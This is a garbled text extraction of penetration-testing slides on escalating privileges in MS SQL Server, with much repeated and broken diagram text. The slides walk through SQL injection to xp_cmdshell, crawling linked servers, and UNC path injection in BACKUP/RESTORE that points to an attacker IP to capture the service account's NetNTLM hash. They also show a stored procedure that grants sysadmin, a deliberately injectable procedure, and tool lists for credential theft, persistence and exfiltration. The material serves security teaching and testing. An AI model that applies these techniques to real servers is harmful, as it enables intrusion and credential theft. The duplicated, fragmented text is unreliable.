ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
